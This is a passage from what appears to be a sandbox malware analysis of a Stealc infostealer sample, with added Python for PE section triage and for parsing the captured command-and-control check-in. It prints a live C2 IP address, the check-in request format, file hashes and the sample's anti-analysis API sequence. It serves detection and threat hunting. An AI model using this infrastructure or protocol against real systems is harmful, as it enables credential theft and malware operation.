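IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Assumption: names a normal MSVC/MinGW build emits; anything else is worth a look.
STANDARD_SECTION_NAMES = {".text", ".data", ".rdata", ".bss", ".idata", ".edata",
                          ".rsrc", ".reloc", ".tls", ".pdata", ".xdata", ".CRT"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 8.0 means every byte value is equally frequent (encrypted/compressed)."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def triage_sections(pe: bytes, entropy_threshold: float = 7.0) -> list:
    """Walk the section table of a PE image and attach packer-style findings to each section."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PtrSymTab, NumSyms, SizeOfOptionalHeader, Characteristics
    _, num_sections, _, _, _, size_opt, _ = struct.unpack_from("<HHIIIHH", pe, e_lfanew + 4)
    opt = e_lfanew + 24
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]        # AddressOfEntryPoint (same offset for PE32/PE32+)
    table = opt + size_opt                                        # section headers start right after the optional header
    results = []
    for i in range(num_sections):
        (raw_name, vsize, va, rawsize, rawptr,
         _, _, _, _, chars) = struct.unpack_from("<8sIIIIIIHHI", pe, table + 40 * i)
        name = raw_name.rstrip(b"\0").decode("latin-1")
        data = pe[rawptr:rawptr + rawsize] if rawsize else b""
        entropy = shannon_entropy(data)
        findings = []
        if not name or not all(c.isalnum() or c in "._$" for c in name):
            findings.append("odd-name")
        elif name not in STANDARD_SECTION_NAMES:
            findings.append("non-standard-name")
        if chars & IMAGE_SCN_MEM_WRITE and chars & IMAGE_SCN_MEM_EXECUTE:
            findings.append("write+execute")                      # self-modifying / unpacks into itself
        if rawsize == 0 and vsize:
            findings.append("virtual-only")                       # nothing on disk, filled at run time
        if entropy >= entropy_threshold:
            findings.append("high-entropy")
        if va <= entry_rva < va + max(vsize, rawsize) and name not in STANDARD_SECTION_NAMES:
            findings.append("entry-point-in-nonstandard-section")
        results.append({"name": name, "va": va, "vsize": vsize, "rawsize": rawsize,
                        "entropy": round(entropy, 3), "findings": findings})
    return results


def build_sample_pe() -> bytes:
    """Constructed 3-section PE32 image (not the analysed sample) mirroring the table above."""
    img = bytearray(0x800)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)                       # e_lfanew
    img[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", img, 0x44, 0x14C, 3, 0, 0, 0, 0xE0, 0x102)
    # Optional header: Magic=PE32, linker 14.0, SizeOfCode, SizeOfInitData, SizeOfUninitData, AddressOfEntryPoint
    struct.pack_into("<HBBIIII", img, 0x58, 0x10B, 14, 0, 0x200, 0x200, 0, 0x1010)
    sections = [  # (name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, Characteristics)
        (b"",      0x1000, 0x1000, 0x200, 0x400, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
        (b".text", 0x200,  0x2000, 0x200, 0x600, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
        (b".rsrc", 0x1000, 0x3000, 0x0,   0x0,   IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    ]
    table = 0x58 + 0xE0
    for i, (name, vsize, va, rawsize, rawptr, chars) in enumerate(sections):
        struct.pack_into("<8sIIIIIIHHI", img, table + 40 * i, name, vsize, va, rawsize, rawptr, 0, 0, 0, 0, chars)
    img[0x400:0x600] = bytes((i * 197 + 31) & 0xFF for i in range(0x200))  # every byte value twice -> entropy 8.0
    img[0x600:0x800] = b"\x55\x8b\xec\xc3" * 0x80                            # push ebp / mov ebp,esp / ret -> entropy 2.0
    return bytes(img)


if __name__ == "__main__":
    for s in triage_sections(build_sample_pe()):
        print(f"{s['name'] or '(none)':8} va=0x{s['va']:x} raw=0x{s['rawsize']:x} H={s['entropy']:.2f} {s['findings']}")
```

To run it on the real file, pass `open("file.exe", "rb").read()` to `triage_sections`; the entropy column of the table is what the `high-entropy` finding reproduces, and the write+execute finding is why a debugger or EDR will see the image rewriting its own code pages before the real entry point runs.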
                            Timestamp                        SID      Signature                                        Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
                            2024-10-10T20:25:12.186591+0200  2044243  ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in  1         192.168.2.4  49730        185.215.113.37  80         TCP
                            Timestamp                             Source Port  Dest Port  Source IP       Dest IP
                            Oct 10, 2024 20:25:10.589113951 CEST  49730        80         192.168.2.4     185.215.113.37
                            Oct 10, 2024 20:25:11.205245018 CEST  80           49730      185.215.113.37  192.168.2.4
                            Oct 10, 2024 20:25:11.205580950 CEST  49730        80         192.168.2.4     185.215.113.37
                            Oct 10, 2024 20:25:11.205940008 CEST  49730        80         192.168.2.4     185.215.113.37
                            Oct 10, 2024 20:25:11.211221933 CEST  80           49730      185.215.113.37  192.168.2.4
                            Oct 10, 2024 20:25:11.945841074 CEST  80           49730      185.215.113.37  192.168.2.4
                            Oct 10, 2024 20:25:11.945943117 CEST  49730        80         192.168.2.4     185.215.113.37
                            Oct 10, 2024 20:25:11.948759079 CEST  49730        80         192.168.2.4     185.215.113.37
                            Oct 10, 2024 20:25:11.953767061 CEST  80           49730      185.215.113.37  192.168.2.4
                            Oct 10, 2024 20:25:12.186496019 CEST  80           49730      185.215.113.37  192.168.2.4
                            Oct 10, 2024 20:25:12.186590910 CEST  49730        80         192.168.2.4     185.215.113.37
                            Oct 10, 2024 20:25:14.688338995 CEST  49730        80         192.168.2.4     185.215.113.37
                            • 185.215.113.37
                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                            0           192.168.2.4  49730        185.215.113.37  80                7284  C:\Users\user\Desktop\file.exe
                            Timestamp  Bytes transferred  Direction  Data
                            Oct 10, 2024 20:25:11.205940008 CEST  89  OUT  GET / HTTP/1.1
                            Host: 185.215.113.37
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Oct 10, 2024 20:25:11.945841074 CEST  203  IN  HTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 18:25:11 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 0
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Oct 10, 2024 20:25:11.948759079 CEST  411  OUT  POST /e2b1563c6670f193.php HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----CFHDBFIEGIDGIECBKJEC
                            Host: 185.215.113.37
                            Content-Length: 210
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Data Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 34 43 46 32 42 45 36 44 46 39 31 39 32 32 30 36 33 34 39 37 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 2d 2d 0d 0a
                            Data Ascii:
                            ------CFHDBFIEGIDGIECBKJEC
                            Content-Disposition: form-data; name="hwid"

                            24CF2BE6DF91922063497
                            ------CFHDBFIEGIDGIECBKJEC
                            Content-Disposition: form-data; name="build"

                            doma
                            ------CFHDBFIEGIDGIECBKJEC--
                            Oct 10, 2024 20:25:12.186496019 CEST  210  IN  HTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 18:25:12 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 8
                            Keep-Alive: timeout=5, max=99
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 59 6d 78 76 59 32 73 3d
                            Data Ascii: YmxvY2s= (base64 for "block")
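The exchange above is the whole C2 check-in: an empty GET / to the bare IP (the server answers 200 with Content-Length: 0, which works as a liveness probe), then a multipart/form-data POST carrying just two fields, hwid and build, answered with eight bytes that base64-decode to "block"; the process record below shows the sample had exited by the end of the run. As an added example, and not code from the report or from the sample, the following Python parses that POST body from the hex dump Joe Sandbox printed, strictly decodes the reply, and applies a shape check. The shape heuristic (a multipart POST whose only fields are hwid and build) is an assumption drawn from this single capture, not a published detection rule; the two constants are copied from the stream above.

```python
import base64
import re

# Copied from the HTTP stream above: the POST's Content-Type, Joe Sandbox's hex dump of
# its 210-byte body, and the 8-byte response body.
CONTENT_TYPE = "multipart/form-data; boundary=----CFHDBFIEGIDGIECBKJEC"
POST_BODY = bytes.fromhex(
    "2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 "
    "6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 34 43 46 32 42 45 36 44 46 39 31 39 32 32 30 36 33 34 39 37 0d 0a "
    "2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 "
    "6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a "
    "2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 2d 2d 0d 0a"
)
RESPONSE_BODY = b"YmxvY2s="


def parse_multipart(content_type: str, body: bytes) -> dict:
    """Minimal multipart/form-data parser (RFC 7578 subset): returns {field name: raw value bytes}."""
    m = re.search(r'boundary=("?)([^";]+)\1', content_type)
    if not m:
        raise ValueError("no boundary parameter in Content-Type")
    delimiter = b"--" + m.group(2).encode("ascii")   # each part starts with "--" + boundary
    fields = {}
    for part in body.split(delimiter)[1:]:            # [0] is the preamble before the first delimiter
        if part.startswith(b"--"):
            break                                     # closing delimiter "--boundary--"
        head, sep, value = part.partition(b"\r\n\r\n")
        if not sep:
            continue                                  # malformed part: no header/body separator
        name = re.search(rb';\s*name="([^"]*)"', head)   # ";\s*" so filename="..." is not matched
        if name is None:
            continue
        if value.endswith(b"\r\n"):
            value = value[:-2]                        # that CRLF belongs to the next delimiter line
        fields[name.group(1).decode("ascii")] = value
    return fields


def decode_c2_response(body: bytes) -> str:
    """Decode the base64 reply strictly, so a non-base64 body raises instead of being half-read."""
    return base64.b64decode(body, validate=True).decode("ascii")


def summarize_checkin(content_type: str, body: bytes, response: bytes) -> dict:
    """Pull the bot identifiers and the server's verdict out of one request/response pair."""
    fields = parse_multipart(content_type, body)
    return {
        "hwid": fields.get("hwid", b"").decode("ascii", "replace"),
        "build": fields.get("build", b"").decode("ascii", "replace"),
        "reply": decode_c2_response(response),
        # Heuristic (assumption from this single capture, not a published rule): a multipart
        # POST whose only fields are hwid and build has the shape of this check-in.
        "matches_checkin_shape": set(fields) == {"hwid", "build"},
    }


if __name__ == "__main__":
    print(summarize_checkin(CONTENT_TYPE, POST_BODY, RESPONSE_BODY))
```

The hwid value is what the server keys the victim on and the build value ("doma") is the campaign tag; both are the fields to log from a proxy when hunting for other infections talking to the same host, and both survive a change of the .php path, which is the only part of the URL that varies here.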



                            Target ID: 0
                            Start time: 14:25:07
                            Start date: 10/10/2024
                            Path: C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit): true
                            Commandline: "C:\Users\user\Desktop\file.exe"
                            Imagebase: 0x120000
                            File size: 1'852'928 bytes
                            MD5 hash: 3C4A472BBA3DEE50286E154336B9643E
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1817097974.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1775667377.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            Reputation: low
                            Has exited: true


                              Execution Graph

                              Execution Coverage: 7.7%
                              Dynamic/Decrypted Code Coverage: 0%
                              Signature Coverage: 9.7%
                              Total number of Nodes: 2000
                              Total number of Limit Nodes: 24
                              execution_graph 13372 1369f0 13417 122260 13372->13417 13396 136a64 13397 13a9b0 4 API calls 13396->13397 13398 136a6b 13397->13398 13399 13a9b0 4 API calls 13398->13399 13400 136a72 13399->13400 13401 13a9b0 4 API calls 13400->13401 13402 136a79 13401->13402 13403 13a9b0 4 API calls 13402->13403 13404 136a80 13403->13404 13569 13a8a0 13404->13569 13406 136b0c 13573 136920 GetSystemTime 13406->13573 13408 136a89 13408->13406 13409 136ac2 OpenEventA 13408->13409 13411 136af5 CloseHandle Sleep 13409->13411 13412 136ad9 13409->13412 13414 136b0a 13411->13414 13416 136ae1 CreateEventA 13412->13416 13414->13408 13416->13406 13770 1245c0 13417->13770 13419 122274 13420 1245c0 2 API calls 13419->13420 13421 12228d 13420->13421 13422 1245c0 2 API calls 13421->13422 13423 1222a6 13422->13423 13424 1245c0 2 API calls 13423->13424 13425 1222bf 13424->13425 13426 1245c0 2 API calls 13425->13426 13427 1222d8 13426->13427 13428 1245c0 2 API calls 13427->13428 13429 1222f1 13428->13429 13430 1245c0 2 API calls 13429->13430 13431 12230a 13430->13431 13432 1245c0 2 API calls 13431->13432 13433 122323 13432->13433 13434 1245c0 2 API calls 13433->13434 13435 12233c 13434->13435 13436 1245c0 2 API calls 13435->13436 13437 122355 13436->13437 13438 1245c0 2 API calls 13437->13438 13439 12236e 13438->13439 13440 1245c0 2 API calls 13439->13440 13441 122387 13440->13441 13442 1245c0 2 API calls 13441->13442 13443 1223a0 13442->13443 13444 1245c0 2 API calls 13443->13444 13445 1223b9 13444->13445 13446 1245c0 2 API calls 13445->13446 13447 1223d2 13446->13447 13448 1245c0 2 API calls 13447->13448 13449 1223eb 13448->13449 13450 1245c0 2 API calls 13449->13450 13451 122404 13450->13451 13452 1245c0 2 API calls 13451->13452 13453 12241d 13452->13453 13454 1245c0 2 API calls 13453->13454 13455 122436 13454->13455 13456 1245c0 2 API calls 13455->13456 13457 12244f 13456->13457 13458 1245c0 2 API calls 13457->13458 13459 122468 13458->13459 13460 1245c0 2 API 
calls 13459->13460 13461 122481 13460->13461 13462 1245c0 2 API calls 13461->13462 13463 12249a 13462->13463 13464 1245c0 2 API calls 13463->13464 13465 1224b3 13464->13465 13466 1245c0 2 API calls 13465->13466 13467 1224cc 13466->13467 13468 1245c0 2 API calls 13467->13468 13469 1224e5 13468->13469 13470 1245c0 2 API calls 13469->13470 13471 1224fe 13470->13471 13472 1245c0 2 API calls 13471->13472 13473 122517 13472->13473 13474 1245c0 2 API calls 13473->13474 13475 122530 13474->13475 13476 1245c0 2 API calls 13475->13476 13477 122549 13476->13477 13478 1245c0 2 API calls 13477->13478 13479 122562 13478->13479 13480 1245c0 2 API calls 13479->13480 13481 12257b 13480->13481 13482 1245c0 2 API calls 13481->13482 13483 122594 13482->13483 13484 1245c0 2 API calls 13483->13484 13485 1225ad 13484->13485 13486 1245c0 2 API calls 13485->13486 13487 1225c6 13486->13487 13488 1245c0 2 API calls 13487->13488 13489 1225df 13488->13489 13490 1245c0 2 API calls 13489->13490 13491 1225f8 13490->13491 13492 1245c0 2 API calls 13491->13492 13493 122611 13492->13493 13494 1245c0 2 API calls 13493->13494 13495 12262a 13494->13495 13496 1245c0 2 API calls 13495->13496 13497 122643 13496->13497 13498 1245c0 2 API calls 13497->13498 13499 12265c 13498->13499 13500 1245c0 2 API calls 13499->13500 13501 122675 13500->13501 13502 1245c0 2 API calls 13501->13502 13503 12268e 13502->13503 13504 139860 13503->13504 13775 139750 GetPEB 13504->13775 13506 139868 13507 139a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13506->13507 13508 13987a 13506->13508 13509 139af4 GetProcAddress 13507->13509 13510 139b0d 13507->13510 13511 13988c 21 API calls 13508->13511 13509->13510 13512 139b46 13510->13512 13513 139b16 GetProcAddress GetProcAddress 13510->13513 13511->13507 13514 139b68 13512->13514 13515 139b4f GetProcAddress 13512->13515 13513->13512 13516 139b71 GetProcAddress 13514->13516 13517 139b89 13514->13517 13515->13514 13516->13517 13518 139b92 GetProcAddress 
GetProcAddress 13517->13518 13519 136a00 13517->13519 13518->13519 13520 13a740 13519->13520 13521 13a750 13520->13521 13522 136a0d 13521->13522 13523 13a77e lstrcpy 13521->13523 13524 1211d0 13522->13524 13523->13522 13525 1211e8 13524->13525 13526 121217 13525->13526 13527 12120f ExitProcess 13525->13527 13528 121160 GetSystemInfo 13526->13528 13529 121184 13528->13529 13530 12117c ExitProcess 13528->13530 13531 121110 GetCurrentProcess VirtualAllocExNuma 13529->13531 13532 121141 ExitProcess 13531->13532 13533 121149 13531->13533 13776 1210a0 VirtualAlloc 13533->13776 13536 121220 13780 1389b0 13536->13780 13539 121249 __aulldiv 13540 12129a 13539->13540 13541 121292 ExitProcess 13539->13541 13542 136770 GetUserDefaultLangID 13540->13542 13543 1367d3 13542->13543 13544 136792 13542->13544 13550 121190 13543->13550 13544->13543 13545 1367a3 ExitProcess 13544->13545 13546 1367c1 ExitProcess 13544->13546 13547 1367b7 ExitProcess 13544->13547 13548 1367cb ExitProcess 13544->13548 13549 1367ad ExitProcess 13544->13549 13551 1378e0 3 API calls 13550->13551 13552 12119e 13551->13552 13553 1211cc 13552->13553 13554 137850 3 API calls 13552->13554 13557 137850 GetProcessHeap RtlAllocateHeap GetUserNameA 13553->13557 13555 1211b7 13554->13555 13555->13553 13556 1211c4 ExitProcess 13555->13556 13558 136a30 13557->13558 13559 1378e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13558->13559 13560 136a43 13559->13560 13561 13a9b0 13560->13561 13782 13a710 13561->13782 13563 13a9c1 lstrlen 13565 13a9e0 13563->13565 13564 13aa18 13783 13a7a0 13564->13783 13565->13564 13567 13a9fa lstrcpy lstrcat 13565->13567 13567->13564 13568 13aa24 13568->13396 13570 13a8bb 13569->13570 13571 13a90b 13570->13571 13572 13a8f9 lstrcpy 13570->13572 13571->13408 13572->13571 13787 136820 13573->13787 13575 13698e 13576 136998 sscanf 13575->13576 13816 13a800 13576->13816 13578 1369aa SystemTimeToFileTime SystemTimeToFileTime 13579 1369e0 13578->13579 13580 1369ce 13578->13580 13582 135b10 
13579->13582 13580->13579 13581 1369d8 ExitProcess 13580->13581 13583 135b1d 13582->13583 13584 13a740 lstrcpy 13583->13584 13585 135b2e 13584->13585 13818 13a820 lstrlen 13585->13818 13588 13a820 2 API calls 13589 135b64 13588->13589 13590 13a820 2 API calls 13589->13590 13591 135b74 13590->13591 13822 136430 13591->13822 13594 13a820 2 API calls 13595 135b93 13594->13595 13596 13a820 2 API calls 13595->13596 13597 135ba0 13596->13597 13598 13a820 2 API calls 13597->13598 13599 135bad 13598->13599 13600 13a820 2 API calls 13599->13600 13601 135bf9 13600->13601 13831 1226a0 13601->13831 13609 135cc3 13610 136430 lstrcpy 13609->13610 13611 135cd5 13610->13611 13612 13a7a0 lstrcpy 13611->13612 13613 135cf2 13612->13613 13614 13a9b0 4 API calls 13613->13614 13615 135d0a 13614->13615 13616 13a8a0 lstrcpy 13615->13616 13617 135d16 13616->13617 13618 13a9b0 4 API calls 13617->13618 13619 135d3a 13618->13619 13620 13a8a0 lstrcpy 13619->13620 13621 135d46 13620->13621 13622 13a9b0 4 API calls 13621->13622 13623 135d6a 13622->13623 13624 13a8a0 lstrcpy 13623->13624 13625 135d76 13624->13625 13626 13a740 lstrcpy 13625->13626 13627 135d9e 13626->13627 14557 137500 GetWindowsDirectoryA 13627->14557 13630 13a7a0 lstrcpy 13631 135db8 13630->13631 14567 124880 13631->14567 13633 135dbe 14712 1317a0 13633->14712 13635 135dc6 13636 13a740 lstrcpy 13635->13636 13637 135de9 13636->13637 13638 121590 lstrcpy 13637->13638 13639 135dfd 13638->13639 14728 125960 13639->14728 13641 135e03 14872 131050 13641->14872 13643 135e0e 13644 13a740 lstrcpy 13643->13644 13645 135e32 13644->13645 13646 121590 lstrcpy 13645->13646 13647 135e46 13646->13647 13648 125960 34 API calls 13647->13648 13649 135e4c 13648->13649 14876 130d90 13649->14876 13651 135e57 13652 13a740 lstrcpy 13651->13652 13653 135e79 13652->13653 13654 121590 lstrcpy 13653->13654 13655 135e8d 13654->13655 13656 125960 34 API calls 13655->13656 13657 135e93 13656->13657 14883 130f40 13657->14883 13659 135e9e 13660 121590 lstrcpy 
13659->13660 13661 135eb5 13660->13661 14888 131a10 13661->14888 13663 135eba 13664 13a740 lstrcpy 13663->13664 13665 135ed6 13664->13665 15232 124fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13665->15232 13667 135edb 13668 121590 lstrcpy 13667->13668 13669 135f5b 13668->13669 15239 130740 13669->15239 13671 135f60 13672 13a740 lstrcpy 13671->13672 13673 135f86 13672->13673 13674 121590 lstrcpy 13673->13674 13675 135f9a 13674->13675 13676 125960 34 API calls 13675->13676 13677 135fa0 13676->13677 13771 1245d1 RtlAllocateHeap 13770->13771 13773 124621 VirtualProtect 13771->13773 13773->13419 13775->13506 13777 1210c2 ctype 13776->13777 13778 1210fd 13777->13778 13779 1210e2 VirtualFree 13777->13779 13778->13536 13779->13778 13781 121233 GlobalMemoryStatusEx 13780->13781 13781->13539 13782->13563 13784 13a7c2 13783->13784 13785 13a7ec 13784->13785 13786 13a7da lstrcpy 13784->13786 13785->13568 13786->13785 13788 13a740 lstrcpy 13787->13788 13789 136833 13788->13789 13790 13a9b0 4 API calls 13789->13790 13791 136845 13790->13791 13792 13a8a0 lstrcpy 13791->13792 13793 13684e 13792->13793 13794 13a9b0 4 API calls 13793->13794 13795 136867 13794->13795 13796 13a8a0 lstrcpy 13795->13796 13797 136870 13796->13797 13798 13a9b0 4 API calls 13797->13798 13799 13688a 13798->13799 13800 13a8a0 lstrcpy 13799->13800 13801 136893 13800->13801 13802 13a9b0 4 API calls 13801->13802 13803 1368ac 13802->13803 13804 13a8a0 lstrcpy 13803->13804 13805 1368b5 13804->13805 13806 13a9b0 4 API calls 13805->13806 13807 1368cf 13806->13807 13808 13a8a0 lstrcpy 13807->13808 13809 1368d8 13808->13809 13810 13a9b0 4 API calls 13809->13810 13811 1368f3 13810->13811 13812 13a8a0 lstrcpy 13811->13812 13813 1368fc 13812->13813 13814 13a7a0 lstrcpy 13813->13814 13815 136910 13814->13815 13815->13575 13817 13a812 13816->13817 13817->13578 13819 13a83f 13818->13819 13820 135b54 13819->13820 13821 13a87b lstrcpy 13819->13821 13820->13588 13821->13820 13823 13a8a0 lstrcpy 13822->13823 13824 136443 
13823->13824 13825 13a8a0 lstrcpy 13824->13825 13826 136455 13825->13826 13827 13a8a0 lstrcpy 13826->13827 13828 136467 13827->13828 13829 13a8a0 lstrcpy 13828->13829 13830 135b86 13829->13830 13830->13594 13832 1245c0 2 API calls 13831->13832 13833 1226b4 13832->13833 13834 1245c0 2 API calls 13833->13834 13835 1226d7 13834->13835 13836 1245c0 2 API calls 13835->13836 13837 1226f0 13836->13837 13838 1245c0 2 API calls 13837->13838 13839 122709 13838->13839 13840 1245c0 2 API calls 13839->13840 13841 122736 13840->13841 13842 1245c0 2 API calls 13841->13842 13843 12274f 13842->13843 13844 1245c0 2 API calls 13843->13844 13845 122768 13844->13845 13846 1245c0 2 API calls 13845->13846 13847 122795 13846->13847 13848 1245c0 2 API calls 13847->13848 13849 1227ae 13848->13849 13850 1245c0 2 API calls 13849->13850 13851 1227c7 13850->13851 13852 1245c0 2 API calls 13851->13852 13853 1227e0 13852->13853 13854 1245c0 2 API calls 13853->13854 13855 1227f9 13854->13855 13856 1245c0 2 API calls 13855->13856 13857 122812 13856->13857 13858 1245c0 2 API calls 13857->13858 13859 12282b 13858->13859 13860 1245c0 2 API calls 13859->13860 13861 122844 13860->13861 13862 1245c0 2 API calls 13861->13862 13863 12285d 13862->13863 13864 1245c0 2 API calls 13863->13864 13865 122876 13864->13865 13866 1245c0 2 API calls 13865->13866 13867 12288f 13866->13867 13868 1245c0 2 API calls 13867->13868 13869 1228a8 13868->13869 13870 1245c0 2 API calls 13869->13870 13871 1228c1 13870->13871 13872 1245c0 2 API calls 13871->13872 13873 1228da 13872->13873 13874 1245c0 2 API calls 13873->13874 13875 1228f3 13874->13875 13876 1245c0 2 API calls 13875->13876 13877 12290c 13876->13877 13878 1245c0 2 API calls 13877->13878 13879 122925 13878->13879 13880 1245c0 2 API calls 13879->13880 13881 12293e 13880->13881 13882 1245c0 2 API calls 13881->13882 13883 122957 13882->13883 13884 1245c0 2 API calls 13883->13884 13885 122970 13884->13885 13886 1245c0 2 API calls 13885->13886 13887 122989 13886->13887 
13888 1245c0 2 API calls 13887->13888 13889 1229a2 13888->13889 13890 1245c0 2 API calls 13889->13890 13891 1229bb 13890->13891 13892 1245c0 2 API calls 13891->13892 13893 1229d4 13892->13893 13894 1245c0 2 API calls 13893->13894 13895 1229ed 13894->13895 13896 1245c0 2 API calls 13895->13896 13897 122a06 13896->13897 13898 1245c0 2 API calls 13897->13898 13899 122a1f 13898->13899 13900 1245c0 2 API calls 13899->13900 13901 122a38 13900->13901 13902 1245c0 2 API calls 13901->13902 13903 122a51 13902->13903 13904 1245c0 2 API calls 13903->13904 13905 122a6a 13904->13905 13906 1245c0 2 API calls 13905->13906 13907 122a83 13906->13907 13908 1245c0 2 API calls 13907->13908 13909 122a9c 13908->13909 13910 1245c0 2 API calls 13909->13910 13911 122ab5 13910->13911 13912 1245c0 2 API calls 13911->13912 13913 122ace 13912->13913 13914 1245c0 2 API calls 13913->13914 13915 122ae7 13914->13915 13916 1245c0 2 API calls 13915->13916 13917 122b00 13916->13917 13918 1245c0 2 API calls 13917->13918 13919 122b19 13918->13919 13920 1245c0 2 API calls 13919->13920 13921 122b32 13920->13921 13922 1245c0 2 API calls 13921->13922 13923 122b4b 13922->13923 13924 1245c0 2 API calls 13923->13924 13925 122b64 13924->13925 13926 1245c0 2 API calls 13925->13926 13927 122b7d 13926->13927 13928 1245c0 2 API calls 13927->13928 13929 122b96 13928->13929 13930 1245c0 2 API calls 13929->13930 13931 122baf 13930->13931 13932 1245c0 2 API calls 13931->13932 13933 122bc8 13932->13933 13934 1245c0 2 API calls 13933->13934 13935 122be1 13934->13935 13936 1245c0 2 API calls 13935->13936 13937 122bfa 13936->13937 13938 1245c0 2 API calls 13937->13938 13939 122c13 13938->13939 13940 1245c0 2 API calls 13939->13940 13941 122c2c 13940->13941 13942 1245c0 2 API calls 13941->13942 13943 122c45 13942->13943 13944 1245c0 2 API calls 13943->13944 13945 122c5e 13944->13945 13946 1245c0 2 API calls 13945->13946 13947 122c77 13946->13947 13948 1245c0 2 API calls 13947->13948 13949 122c90 13948->13949 13950 1245c0 2 
API calls 13949->13950 13951 122ca9 13950->13951 13952 1245c0 2 API calls 13951->13952 13953 122cc2 13952->13953 13954 1245c0 2 API calls 13953->13954 13955 122cdb 13954->13955 13956 1245c0 2 API calls 13955->13956 13957 122cf4 13956->13957 13958 1245c0 2 API calls 13957->13958 13959 122d0d 13958->13959 13960 1245c0 2 API calls 13959->13960 13961 122d26 13960->13961 13962 1245c0 2 API calls 13961->13962 13963 122d3f 13962->13963 13964 1245c0 2 API calls 13963->13964 13965 122d58 13964->13965 13966 1245c0 2 API calls 13965->13966 13967 122d71 13966->13967 13968 1245c0 2 API calls 13967->13968 13969 122d8a 13968->13969 13970 1245c0 2 API calls 13969->13970 13971 122da3 13970->13971 13972 1245c0 2 API calls 13971->13972 13973 122dbc 13972->13973 13974 1245c0 2 API calls 13973->13974 13975 122dd5 13974->13975 13976 1245c0 2 API calls 13975->13976 13977 122dee 13976->13977 13978 1245c0 2 API calls 13977->13978 13979 122e07 13978->13979 13980 1245c0 2 API calls 13979->13980 13981 122e20 13980->13981 13982 1245c0 2 API calls 13981->13982 13983 122e39 13982->13983 13984 1245c0 2 API calls 13983->13984 13985 122e52 13984->13985 13986 1245c0 2 API calls 13985->13986 13987 122e6b 13986->13987 13988 1245c0 2 API calls 13987->13988 13989 122e84 13988->13989 13990 1245c0 2 API calls 13989->13990 13991 122e9d 13990->13991 13992 1245c0 2 API calls 13991->13992 13993 122eb6 13992->13993 13994 